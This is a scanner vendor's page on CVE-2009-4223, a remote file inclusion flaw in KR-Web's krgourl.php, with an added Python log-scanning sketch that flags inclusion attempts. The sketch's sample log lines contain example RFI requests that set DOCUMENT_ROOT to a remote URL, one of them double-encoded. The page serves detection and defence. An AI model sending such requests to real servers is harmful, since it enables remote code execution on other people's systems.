CVE-2009-4223 Scanner
CVE-2009-4223 scanner - Remote File Inclusion (RFI) vulnerability in KR-Web
Short Info
Level: High
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 15 seconds
Time Interval: 1 month
Scan only one: URL
Toolbox: -
KR-Web is a web-based user interface designed for controlling and configuring Yealink IP phones. This product is usually used by system administrators in various organizations to monitor, manage, and configure their IP phones' settings through a web-based interface. The KR-Web interface provides access to various administrative functions, including call routing, logging, system configuration, and firmware upgrades.
CVE-2009-4223 is a security vulnerability that was detected in KR-Web 1.1b2 and earlier versions. The flaw is a PHP remote file inclusion in adm/krgourl.php: attackers can execute malicious PHP code by supplying a URL in the DOCUMENT_ROOT parameter. Exploiting this vulnerability gives an attacker complete control over the system, including access to confidential data, unauthorized changes to system settings, and the execution of arbitrary code on the affected system.
Exploiting the KR-Web vulnerability, CVE-2009-4223, can lead to severe consequences for the affected organization. Attackers could gain access to sensitive data or perform tasks such as stealing login credentials, accessing sensitive financial information, or installing malware on the victim's system. The attacker can use such access to launch further attacks through the network, potentially causing irreparable harm to the organization's reputation and financial health.
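A detection sketch for the request pattern described above, added here as an example (not code from s4e.io or KR-Web): it flags access-log requests to adm/krgourl.php that set DOCUMENT_ROOT and treats URL-like values as inclusion attempts. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A value that starts like a URL (scheme://...) rather than a local path.
URL_VALUE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)
VULN_SCRIPT = "/adm/krgourl.php"  # script named in the CVE description
VULN_PARAM = "DOCUMENT_ROOT"      # parameter named in the CVE description

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /kr-web/adm/krgourl.php?DOCUMENT_ROOT=http://example.invalid/x HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /kr-web//adm/krgourl.php?DOCUMENT_ROOT=http%253A%252F%252Fexample.invalid%252Fx HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /kr-web/adm/krgourl.php?DOCUMENT_ROOT=/var/www HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /kr-web/adm/krgourl.php HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:03:00 +0000] "GET /kr-web/index.php?page=home HTTP/1.1" 200 512',
]

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (%253A -> %3A -> :)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return 'rfi-attempt', 'param-override', or None for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Collapse leading slashes so urlsplit does not read "//x" as a host.
    parts = urlsplit(re.sub(r"^/+", "/", m.group("target")))
    path = re.sub(r"/+", "/", fully_unquote(parts.path)).lower()
    if not path.endswith(VULN_SCRIPT):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if fully_unquote(name) == VULN_PARAM:
            is_url = URL_VALUE_RE.match(fully_unquote(value))
            return "rfi-attempt" if is_url else "param-override"
    return None

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "|", line)
```

Access logs record only the query string, so a DOCUMENT_ROOT value sent in a POST body is not visible to this check and needs request-body logging or a WAF rule instead.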
Thanks to the pro features of s4e.io, you can easily and quickly learn about vulnerabilities present in your digital assets. By using this platform, you can regularly scan your systems, identify vulnerabilities, and take necessary precautions to mitigate risks. We remind you never to underestimate the importance of security, even with trusted products like KR-Web. It is always best to stay proactive and vigilant in the face of evolving threats to keep your digital assets safe and secure.